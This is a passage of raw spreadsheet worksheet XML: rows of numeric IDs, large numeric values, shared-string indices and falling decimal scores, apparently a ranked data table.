      <c r="A14332" s="1">
        <v>9875.0</v>
      </c>
      <c r="B14332" s="2">
        <v>5.6745122E7</v>
      </c>
      <c r="C14332" s="2" t="s">
        <v>13808</v>
      </c>
      <c r="D14332" s="2">
        <v>1.0</v>
      </c>
      <c r="E14332" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14332" s="2">
        <v>0.1324786324786325</v>
      </c>
    </row>
    <row r="14333" ht="15.75" customHeight="1">
      <c r="A14333" s="1">
        <v>23222.0</v>
      </c>
      <c r="B14333" s="2">
        <v>5279557.0</v>
      </c>
      <c r="C14333" s="2" t="s">
        <v>13779</v>
      </c>
      <c r="D14333" s="2">
        <v>1.0</v>
      </c>
      <c r="E14333" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14333" s="2">
        <v>0.1323232323232323</v>
      </c>
    </row>
    <row r="14334" ht="15.75" customHeight="1">
      <c r="A14334" s="1">
        <v>5936.0</v>
      </c>
      <c r="B14334" s="2">
        <v>4.7261778E7</v>
      </c>
      <c r="C14334" s="2" t="s">
        <v>13809</v>
      </c>
      <c r="D14334" s="2">
        <v>1.0</v>
      </c>
      <c r="E14334" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14334" s="2">
        <v>0.1322378716744914</v>
      </c>
    </row>
    <row r="14335" ht="15.75" customHeight="1">
      <c r="A14335" s="1">
        <v>6395.0</v>
      </c>
      <c r="B14335" s="2">
        <v>4.8461609E7</v>
      </c>
      <c r="C14335" s="2" t="s">
        <v>13810</v>
      </c>
      <c r="D14335" s="2">
        <v>1.0</v>
      </c>
      <c r="E14335" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14335" s="2">
        <v>0.1322378716744914</v>
      </c>
    </row>
    <row r="14336" ht="15.75" customHeight="1">
      <c r="A14336" s="1">
        <v>6483.0</v>
      </c>
      <c r="B14336" s="2">
        <v>4.8669836E7</v>
      </c>
      <c r="C14336" s="2" t="s">
        <v>13811</v>
      </c>
      <c r="D14336" s="2">
        <v>1.0</v>
      </c>
      <c r="E14336" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14336" s="2">
        <v>0.1321548821548822</v>
      </c>
    </row>
    <row r="14337" ht="15.75" customHeight="1">
      <c r="A14337" s="1">
        <v>17099.0</v>
      </c>
      <c r="B14337" s="2">
        <v>4.8682857E7</v>
      </c>
      <c r="C14337" s="2" t="s">
        <v>13812</v>
      </c>
      <c r="D14337" s="2">
        <v>1.0</v>
      </c>
      <c r="E14337" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14337" s="2">
        <v>0.1321548821548822</v>
      </c>
    </row>
    <row r="14338" ht="15.75" customHeight="1">
      <c r="A14338" s="1">
        <v>10397.0</v>
      </c>
      <c r="B14338" s="2">
        <v>9168907.0</v>
      </c>
      <c r="C14338" s="2" t="s">
        <v>13813</v>
      </c>
      <c r="D14338" s="2">
        <v>1.0</v>
      </c>
      <c r="E14338" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14338" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="14339" ht="15.75" customHeight="1">
      <c r="A14339" s="1">
        <v>13282.0</v>
      </c>
      <c r="B14339" s="2">
        <v>3.4405075E7</v>
      </c>
      <c r="C14339" s="2" t="s">
        <v>13814</v>
      </c>
      <c r="D14339" s="2">
        <v>1.0</v>
      </c>
      <c r="E14339" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14339" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="14340" ht="15.75" customHeight="1">
      <c r="A14340" s="1">
        <v>18128.0</v>
      </c>
      <c r="B14340" s="2">
        <v>5.1800083E7</v>
      </c>
      <c r="C14340" s="2" t="s">
        <v>13815</v>
      </c>
      <c r="D14340" s="2">
        <v>1.0</v>
      </c>
      <c r="E14340" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14340" s="2">
        <v>0.1320582877959927</v>
      </c>
    </row>
    <row r="14341" ht="15.75" customHeight="1">
      <c r="A14341" s="1">
        <v>1990.0</v>
      </c>
      <c r="B14341" s="2">
        <v>3.0507243E7</v>
      </c>
      <c r="C14341" s="2" t="s">
        <v>13816</v>
      </c>
      <c r="D14341" s="2">
        <v>1.0</v>
      </c>
      <c r="E14341" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14341" s="2">
        <v>0.1319444444444445</v>
      </c>
    </row>
    <row r="14342" ht="15.75" customHeight="1">
      <c r="A14342" s="1">
        <v>14917.0</v>
      </c>
      <c r="B14342" s="2">
        <v>4.1191503E7</v>
      </c>
      <c r="C14342" s="2" t="s">
        <v>13817</v>
      </c>
      <c r="D14342" s="2">
        <v>1.0</v>
      </c>
      <c r="E14342" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14342" s="2">
        <v>0.1319444444444444</v>
      </c>
    </row>
    <row r="14343" ht="15.75" customHeight="1">
      <c r="A14343" s="1">
        <v>22578.0</v>
      </c>
      <c r="B14343" s="2">
        <v>3.8764736E7</v>
      </c>
      <c r="C14343" s="2" t="s">
        <v>13818</v>
      </c>
      <c r="D14343" s="2">
        <v>1.0</v>
      </c>
      <c r="E14343" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14343" s="2">
        <v>0.1319444444444444</v>
      </c>
    </row>
    <row r="14344" ht="15.75" customHeight="1">
      <c r="A14344" s="1">
        <v>10019.0</v>
      </c>
      <c r="B14344" s="2">
        <v>5.7039323E7</v>
      </c>
      <c r="C14344" s="2" t="s">
        <v>13819</v>
      </c>
      <c r="D14344" s="2">
        <v>1.0</v>
      </c>
      <c r="E14344" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14344" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="14345" ht="15.75" customHeight="1">
      <c r="A14345" s="1">
        <v>13598.0</v>
      </c>
      <c r="B14345" s="2">
        <v>3.5783123E7</v>
      </c>
      <c r="C14345" s="2" t="s">
        <v>13820</v>
      </c>
      <c r="D14345" s="2">
        <v>1.0</v>
      </c>
      <c r="E14345" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14345" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="14346" ht="15.75" customHeight="1">
      <c r="A14346" s="1">
        <v>27292.0</v>
      </c>
      <c r="B14346" s="2">
        <v>2.1260511E7</v>
      </c>
      <c r="C14346" s="2" t="s">
        <v>13821</v>
      </c>
      <c r="D14346" s="2">
        <v>1.0</v>
      </c>
      <c r="E14346" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14346" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="14347" ht="15.75" customHeight="1">
      <c r="A14347" s="1">
        <v>27628.0</v>
      </c>
      <c r="B14347" s="2">
        <v>2.270865E7</v>
      </c>
      <c r="C14347" s="2" t="s">
        <v>13822</v>
      </c>
      <c r="D14347" s="2">
        <v>1.0</v>
      </c>
      <c r="E14347" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14347" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="14348" ht="15.75" customHeight="1">
      <c r="A14348" s="1">
        <v>34176.0</v>
      </c>
      <c r="B14348" s="2">
        <v>9939900.0</v>
      </c>
      <c r="C14348" s="2" t="s">
        <v>13823</v>
      </c>
      <c r="D14348" s="2">
        <v>1.0</v>
      </c>
      <c r="E14348" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14348" s="2">
        <v>0.1317204301075269</v>
      </c>
    </row>
    <row r="14349" ht="15.75" customHeight="1">
      <c r="A14349" s="1">
        <v>16613.0</v>
      </c>
      <c r="B14349" s="2">
        <v>4.7063725E7</v>
      </c>
      <c r="C14349" s="2" t="s">
        <v>13824</v>
      </c>
      <c r="D14349" s="2">
        <v>1.0</v>
      </c>
      <c r="E14349" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14349" s="2">
        <v>0.131578947368421</v>
      </c>
    </row>
    <row r="14350" ht="15.75" customHeight="1">
      <c r="A14350" s="1">
        <v>3294.0</v>
      </c>
      <c r="B14350" s="2">
        <v>3.7513189E7</v>
      </c>
      <c r="C14350" s="2" t="s">
        <v>13825</v>
      </c>
      <c r="D14350" s="2">
        <v>1.0</v>
      </c>
      <c r="E14350" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14350" s="2">
        <v>0.1313932980599648</v>
      </c>
    </row>
    <row r="14351" ht="15.75" customHeight="1">
      <c r="A14351" s="1">
        <v>6996.0</v>
      </c>
      <c r="B14351" s="2">
        <v>5.0077526E7</v>
      </c>
      <c r="C14351" s="2" t="s">
        <v>13826</v>
      </c>
      <c r="D14351" s="2">
        <v>1.0</v>
      </c>
      <c r="E14351" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14351" s="2">
        <v>0.1313932980599648</v>
      </c>
    </row>
    <row r="14352" ht="15.75" customHeight="1">
      <c r="A14352" s="1">
        <v>10838.0</v>
      </c>
      <c r="B14352" s="2">
        <v>1.6020652E7</v>
      </c>
      <c r="C14352" s="2" t="s">
        <v>13827</v>
      </c>
      <c r="D14352" s="2">
        <v>1.0</v>
      </c>
      <c r="E14352" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14352" s="2">
        <v>0.1313932980599648</v>
      </c>
    </row>
    <row r="14353" ht="15.75" customHeight="1">
      <c r="A14353" s="1">
        <v>18183.0</v>
      </c>
      <c r="B14353" s="2">
        <v>5.2000045E7</v>
      </c>
      <c r="C14353" s="2" t="s">
        <v>13828</v>
      </c>
      <c r="D14353" s="2">
        <v>1.0</v>
      </c>
      <c r="E14353" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14353" s="2">
        <v>0.1313932980599648</v>
      </c>
    </row>
    <row r="14354" ht="15.75" customHeight="1">
      <c r="A14354" s="1">
        <v>32784.0</v>
      </c>
      <c r="B14354" s="2">
        <v>6132882.0</v>
      </c>
      <c r="C14354" s="2" t="s">
        <v>13829</v>
      </c>
      <c r="D14354" s="2">
        <v>1.0</v>
      </c>
      <c r="E14354" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14354" s="2">
        <v>0.1313932980599648</v>
      </c>
    </row>
    <row r="14355" ht="15.75" customHeight="1">
      <c r="A14355" s="1">
        <v>19104.0</v>
      </c>
      <c r="B14355" s="2">
        <v>5.4721831E7</v>
      </c>
      <c r="C14355" s="2" t="s">
        <v>13830</v>
      </c>
      <c r="D14355" s="2">
        <v>1.0</v>
      </c>
      <c r="E14355" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14355" s="2">
        <v>0.1312399355877617</v>
      </c>
    </row>
    <row r="14356" ht="15.75" customHeight="1">
      <c r="A14356" s="1">
        <v>804.0</v>
      </c>
      <c r="B14356" s="2">
        <v>2.1290374E7</v>
      </c>
      <c r="C14356" s="2" t="s">
        <v>13831</v>
      </c>
      <c r="D14356" s="2">
        <v>1.0</v>
      </c>
      <c r="E14356" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14356" s="2">
        <v>0.1312260536398468</v>
      </c>
    </row>
    <row r="14357" ht="15.75" customHeight="1">
      <c r="A14357" s="1">
        <v>22481.0</v>
      </c>
      <c r="B14357" s="2">
        <v>3.689751E7</v>
      </c>
      <c r="C14357" s="2" t="s">
        <v>13832</v>
      </c>
      <c r="D14357" s="2">
        <v>1.0</v>
      </c>
      <c r="E14357" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14357" s="2">
        <v>0.1310272536687631</v>
      </c>
    </row>
    <row r="14358" ht="15.75" customHeight="1">
      <c r="A14358" s="1">
        <v>2432.0</v>
      </c>
      <c r="B14358" s="2">
        <v>3.3621474E7</v>
      </c>
      <c r="C14358" s="2" t="s">
        <v>13833</v>
      </c>
      <c r="D14358" s="2">
        <v>1.0</v>
      </c>
      <c r="E14358" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14358" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="14359" ht="15.75" customHeight="1">
      <c r="A14359" s="1">
        <v>8400.0</v>
      </c>
      <c r="B14359" s="2">
        <v>5.3865261E7</v>
      </c>
      <c r="C14359" s="2" t="s">
        <v>13834</v>
      </c>
      <c r="D14359" s="2">
        <v>1.0</v>
      </c>
      <c r="E14359" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14359" s="2">
        <v>0.1308851224105461</v>
      </c>
    </row>
    <row r="14360" ht="15.75" customHeight="1">
      <c r="A14360" s="1">
        <v>16940.0</v>
      </c>
      <c r="B14360" s="2">
        <v>4.8202681E7</v>
      </c>
      <c r="C14360" s="2" t="s">
        <v>13835</v>
      </c>
      <c r="D14360" s="2">
        <v>1.0</v>
      </c>
      <c r="E14360" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14360" s="2">
        <v>0.1307692307692308</v>
      </c>
    </row>
    <row r="14361" ht="15.75" customHeight="1">
      <c r="A14361" s="1">
        <v>19162.0</v>
      </c>
      <c r="B14361" s="2">
        <v>5.4920667E7</v>
      </c>
      <c r="C14361" s="2" t="s">
        <v>13836</v>
      </c>
      <c r="D14361" s="2">
        <v>1.0</v>
      </c>
      <c r="E14361" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14361" s="2">
        <v>0.1307692307692308</v>
      </c>
    </row>
    <row r="14362" ht="15.75" customHeight="1">
      <c r="A14362" s="1">
        <v>3733.0</v>
      </c>
      <c r="B14362" s="2">
        <v>3.9655018E7</v>
      </c>
      <c r="C14362" s="2" t="s">
        <v>13837</v>
      </c>
      <c r="D14362" s="2">
        <v>1.0</v>
      </c>
      <c r="E14362" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14362" s="2">
        <v>0.1306584362139918</v>
      </c>
    </row>
    <row r="14363" ht="15.75" customHeight="1">
      <c r="A14363" s="1">
        <v>18938.0</v>
      </c>
      <c r="B14363" s="2">
        <v>5.4310709E7</v>
      </c>
      <c r="C14363" s="2" t="s">
        <v>13838</v>
      </c>
      <c r="D14363" s="2">
        <v>1.0</v>
      </c>
      <c r="E14363" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14363" s="2">
        <v>0.1305555555555555</v>
      </c>
    </row>
    <row r="14364" ht="15.75" customHeight="1">
      <c r="A14364" s="1">
        <v>3278.0</v>
      </c>
      <c r="B14364" s="2">
        <v>3.7486296E7</v>
      </c>
      <c r="C14364" s="2" t="s">
        <v>13839</v>
      </c>
      <c r="D14364" s="2">
        <v>1.0</v>
      </c>
      <c r="E14364" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14364" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="14365" ht="15.75" customHeight="1">
      <c r="A14365" s="1">
        <v>3817.0</v>
      </c>
      <c r="B14365" s="2">
        <v>4.0093604E7</v>
      </c>
      <c r="C14365" s="2" t="s">
        <v>13840</v>
      </c>
      <c r="D14365" s="2">
        <v>1.0</v>
      </c>
      <c r="E14365" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14365" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="14366" ht="15.75" customHeight="1">
      <c r="A14366" s="1">
        <v>4250.0</v>
      </c>
      <c r="B14366" s="2">
        <v>4.1801813E7</v>
      </c>
      <c r="C14366" s="2" t="s">
        <v>13841</v>
      </c>
      <c r="D14366" s="2">
        <v>1.0</v>
      </c>
      <c r="E14366" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14366" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="14367" ht="15.75" customHeight="1">
      <c r="A14367" s="1">
        <v>7550.0</v>
      </c>
      <c r="B14367" s="2">
        <v>5.152507E7</v>
      </c>
      <c r="C14367" s="2" t="s">
        <v>13842</v>
      </c>
      <c r="D14367" s="2">
        <v>1.0</v>
      </c>
      <c r="E14367" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14367" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="14368" ht="15.75" customHeight="1">
      <c r="A14368" s="1">
        <v>10224.0</v>
      </c>
      <c r="B14368" s="2">
        <v>5.7482511E7</v>
      </c>
      <c r="C14368" s="2" t="s">
        <v>13843</v>
      </c>
      <c r="D14368" s="2">
        <v>1.0</v>
      </c>
      <c r="E14368" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14368" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="14369" ht="15.75" customHeight="1">
      <c r="A14369" s="1">
        <v>12125.0</v>
      </c>
      <c r="B14369" s="2">
        <v>2.6937463E7</v>
      </c>
      <c r="C14369" s="2" t="s">
        <v>13844</v>
      </c>
      <c r="D14369" s="2">
        <v>1.0</v>
      </c>
      <c r="E14369" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14369" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="14370" ht="15.75" customHeight="1">
      <c r="A14370" s="1">
        <v>14551.0</v>
      </c>
      <c r="B14370" s="2">
        <v>3.9955698E7</v>
      </c>
      <c r="C14370" s="2" t="s">
        <v>13845</v>
      </c>
      <c r="D14370" s="2">
        <v>1.0</v>
      </c>
      <c r="E14370" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14370" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="14371" ht="15.75" customHeight="1">
      <c r="A14371" s="1">
        <v>16205.0</v>
      </c>
      <c r="B14371" s="2">
        <v>4.5678364E7</v>
      </c>
      <c r="C14371" s="2" t="s">
        <v>13846</v>
      </c>
      <c r="D14371" s="2">
        <v>1.0</v>
      </c>
      <c r="E14371" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14371" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="14372" ht="15.75" customHeight="1">
      <c r="A14372" s="1">
        <v>16599.0</v>
      </c>
      <c r="B14372" s="2">
        <v>4.7019206E7</v>
      </c>
      <c r="C14372" s="2" t="s">
        <v>13847</v>
      </c>
      <c r="D14372" s="2">
        <v>1.0</v>
      </c>
      <c r="E14372" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14372" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="14373" ht="15.75" customHeight="1">
      <c r="A14373" s="1">
        <v>17176.0</v>
      </c>
      <c r="B14373" s="2">
        <v>4.8895738E7</v>
      </c>
      <c r="C14373" s="2" t="s">
        <v>13848</v>
      </c>
      <c r="D14373" s="2">
        <v>1.0</v>
      </c>
      <c r="E14373" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14373" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="14374" ht="15.75" customHeight="1">
      <c r="A14374" s="1">
        <v>19711.0</v>
      </c>
      <c r="B14374" s="2">
        <v>5.6538503E7</v>
      </c>
      <c r="C14374" s="2" t="s">
        <v>13849</v>
      </c>
      <c r="D14374" s="2">
        <v>1.0</v>
      </c>
      <c r="E14374" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14374" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="14375" ht="15.75" customHeight="1">
      <c r="A14375" s="1">
        <v>20001.0</v>
      </c>
      <c r="B14375" s="2">
        <v>5.7713735E7</v>
      </c>
      <c r="C14375" s="2" t="s">
        <v>13850</v>
      </c>
      <c r="D14375" s="2">
        <v>1.0</v>
      </c>
      <c r="E14375" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14375" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="14376" ht="15.75" customHeight="1">
      <c r="A14376" s="1">
        <v>22199.0</v>
      </c>
      <c r="B14376" s="2">
        <v>3.1938112E7</v>
      </c>
      <c r="C14376" s="2" t="s">
        <v>13851</v>
      </c>
      <c r="D14376" s="2">
        <v>1.0</v>
      </c>
      <c r="E14376" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14376" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="14377" ht="15.75" customHeight="1">
      <c r="A14377" s="1">
        <v>24177.0</v>
      </c>
      <c r="B14377" s="2">
        <v>1.0212388E7</v>
      </c>
      <c r="C14377" s="2" t="s">
        <v>13852</v>
      </c>
      <c r="D14377" s="2">
        <v>1.0</v>
      </c>
      <c r="E14377" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14377" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="14378" ht="15.75" customHeight="1">
      <c r="A14378" s="1">
        <v>26219.0</v>
      </c>
      <c r="B14378" s="2">
        <v>1.6252774E7</v>
      </c>
      <c r="C14378" s="2" t="s">
        <v>13853</v>
      </c>
      <c r="D14378" s="2">
        <v>1.0</v>
      </c>
      <c r="E14378" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14378" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="14379" ht="15.75" customHeight="1">
      <c r="A14379" s="1">
        <v>32169.0</v>
      </c>
      <c r="B14379" s="2">
        <v>5.4577909E7</v>
      </c>
      <c r="C14379" s="2" t="s">
        <v>13854</v>
      </c>
      <c r="D14379" s="2">
        <v>1.0</v>
      </c>
      <c r="E14379" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14379" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="14380" ht="15.75" customHeight="1">
      <c r="A14380" s="1">
        <v>32705.0</v>
      </c>
      <c r="B14380" s="2">
        <v>5953884.0</v>
      </c>
      <c r="C14380" s="2" t="s">
        <v>13855</v>
      </c>
      <c r="D14380" s="2">
        <v>1.0</v>
      </c>
      <c r="E14380" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14380" s="2">
        <v>0.1303030303030303</v>
      </c>
    </row>
    <row r="14381" ht="15.75" customHeight="1">
      <c r="A14381" s="1">
        <v>6742.0</v>
      </c>
      <c r="B14381" s="2">
        <v>4.93678E7</v>
      </c>
      <c r="C14381" s="2" t="s">
        <v>13856</v>
      </c>
      <c r="D14381" s="2">
        <v>1.0</v>
      </c>
      <c r="E14381" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14381" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="14382" ht="15.75" customHeight="1">
      <c r="A14382" s="1">
        <v>25709.0</v>
      </c>
      <c r="B14382" s="2">
        <v>1.4530134E7</v>
      </c>
      <c r="C14382" s="2" t="s">
        <v>13857</v>
      </c>
      <c r="D14382" s="2">
        <v>1.0</v>
      </c>
      <c r="E14382" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14382" s="2">
        <v>0.1302367941712204</v>
      </c>
    </row>
    <row r="14383" ht="15.75" customHeight="1">
      <c r="A14383" s="1">
        <v>2721.0</v>
      </c>
      <c r="B14383" s="2">
        <v>3.494083E7</v>
      </c>
      <c r="C14383" s="2" t="s">
        <v>13858</v>
      </c>
      <c r="D14383" s="2">
        <v>1.0</v>
      </c>
      <c r="E14383" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14383" s="2">
        <v>0.1301824212271974</v>
      </c>
    </row>
    <row r="14384" ht="15.75" customHeight="1">
      <c r="A14384" s="1">
        <v>26075.0</v>
      </c>
      <c r="B14384" s="2">
        <v>1.5623017E7</v>
      </c>
      <c r="C14384" s="2" t="s">
        <v>13859</v>
      </c>
      <c r="D14384" s="2">
        <v>1.0</v>
      </c>
      <c r="E14384" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14384" s="2">
        <v>0.1301824212271974</v>
      </c>
    </row>
    <row r="14385" ht="15.75" customHeight="1">
      <c r="A14385" s="1">
        <v>4789.0</v>
      </c>
      <c r="B14385" s="2">
        <v>4.3478394E7</v>
      </c>
      <c r="C14385" s="2" t="s">
        <v>13860</v>
      </c>
      <c r="D14385" s="2">
        <v>1.0</v>
      </c>
      <c r="E14385" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14385" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="14386" ht="15.75" customHeight="1">
      <c r="A14386" s="1">
        <v>6179.0</v>
      </c>
      <c r="B14386" s="2">
        <v>4.7903635E7</v>
      </c>
      <c r="C14386" s="2" t="s">
        <v>13861</v>
      </c>
      <c r="D14386" s="2">
        <v>1.0</v>
      </c>
      <c r="E14386" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14386" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="14387" ht="15.75" customHeight="1">
      <c r="A14387" s="1">
        <v>13892.0</v>
      </c>
      <c r="B14387" s="2">
        <v>3.7033752E7</v>
      </c>
      <c r="C14387" s="2" t="s">
        <v>13862</v>
      </c>
      <c r="D14387" s="2">
        <v>1.0</v>
      </c>
      <c r="E14387" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14387" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="14388" ht="15.75" customHeight="1">
      <c r="A14388" s="1">
        <v>15618.0</v>
      </c>
      <c r="B14388" s="2">
        <v>4.3549095E7</v>
      </c>
      <c r="C14388" s="2" t="s">
        <v>13863</v>
      </c>
      <c r="D14388" s="2">
        <v>1.0</v>
      </c>
      <c r="E14388" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14388" s="2">
        <v>0.1299603174603175</v>
      </c>
    </row>
    <row r="14389" ht="15.75" customHeight="1">
      <c r="A14389" s="1">
        <v>18368.0</v>
      </c>
      <c r="B14389" s="2">
        <v>5.2569774E7</v>
      </c>
      <c r="C14389" s="2" t="s">
        <v>13864</v>
      </c>
      <c r="D14389" s="2">
        <v>1.0</v>
      </c>
      <c r="E14389" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14389" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="14390" ht="15.75" customHeight="1">
      <c r="A14390" s="1">
        <v>25322.0</v>
      </c>
      <c r="B14390" s="2">
        <v>1.3440274E7</v>
      </c>
      <c r="C14390" s="2" t="s">
        <v>13865</v>
      </c>
      <c r="D14390" s="2">
        <v>1.0</v>
      </c>
      <c r="E14390" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14390" s="2">
        <v>0.1299283154121864</v>
      </c>
    </row>
    <row r="14391" ht="15.75" customHeight="1">
      <c r="A14391" s="1">
        <v>3801.0</v>
      </c>
      <c r="B14391" s="2">
        <v>3.998532E7</v>
      </c>
      <c r="C14391" s="2" t="s">
        <v>13866</v>
      </c>
      <c r="D14391" s="2">
        <v>1.0</v>
      </c>
      <c r="E14391" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14391" s="2">
        <v>0.1299019607843138</v>
      </c>
    </row>
    <row r="14392" ht="15.75" customHeight="1">
      <c r="A14392" s="1">
        <v>4514.0</v>
      </c>
      <c r="B14392" s="2">
        <v>4.260366E7</v>
      </c>
      <c r="C14392" s="2" t="s">
        <v>13867</v>
      </c>
      <c r="D14392" s="2">
        <v>1.0</v>
      </c>
      <c r="E14392" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14392" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="14393" ht="15.75" customHeight="1">
      <c r="A14393" s="1">
        <v>5099.0</v>
      </c>
      <c r="B14393" s="2">
        <v>4.4511575E7</v>
      </c>
      <c r="C14393" s="2" t="s">
        <v>13868</v>
      </c>
      <c r="D14393" s="2">
        <v>1.0</v>
      </c>
      <c r="E14393" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14393" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="14394" ht="15.75" customHeight="1">
      <c r="A14394" s="1">
        <v>5653.0</v>
      </c>
      <c r="B14394" s="2">
        <v>4.6286945E7</v>
      </c>
      <c r="C14394" s="2" t="s">
        <v>13869</v>
      </c>
      <c r="D14394" s="2">
        <v>1.0</v>
      </c>
      <c r="E14394" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14394" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="14395" ht="15.75" customHeight="1">
      <c r="A14395" s="1">
        <v>7320.0</v>
      </c>
      <c r="B14395" s="2">
        <v>5.0887869E7</v>
      </c>
      <c r="C14395" s="2" t="s">
        <v>13870</v>
      </c>
      <c r="D14395" s="2">
        <v>1.0</v>
      </c>
      <c r="E14395" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14395" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="14396" ht="15.75" customHeight="1">
      <c r="A14396" s="1">
        <v>29259.0</v>
      </c>
      <c r="B14396" s="2">
        <v>3.0976302E7</v>
      </c>
      <c r="C14396" s="2" t="s">
        <v>13871</v>
      </c>
      <c r="D14396" s="2">
        <v>1.0</v>
      </c>
      <c r="E14396" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14396" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="14397" ht="15.75" customHeight="1">
      <c r="A14397" s="1">
        <v>32224.0</v>
      </c>
      <c r="B14397" s="2">
        <v>5488896.0</v>
      </c>
      <c r="C14397" s="2" t="s">
        <v>13872</v>
      </c>
      <c r="D14397" s="2">
        <v>1.0</v>
      </c>
      <c r="E14397" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14397" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="14398" ht="15.75" customHeight="1">
      <c r="A14398" s="1">
        <v>9333.0</v>
      </c>
      <c r="B14398" s="2">
        <v>5.5622485E7</v>
      </c>
      <c r="C14398" s="2" t="s">
        <v>13873</v>
      </c>
      <c r="D14398" s="2">
        <v>1.0</v>
      </c>
      <c r="E14398" s="3" t="s">
        <v>13387</v>
      </c>
      <c r="F14398" s="2">
        <v>0.1296296296296296</v>
      </c>
    </row>
    <row r="14399" ht="15.75" customHeight="1">
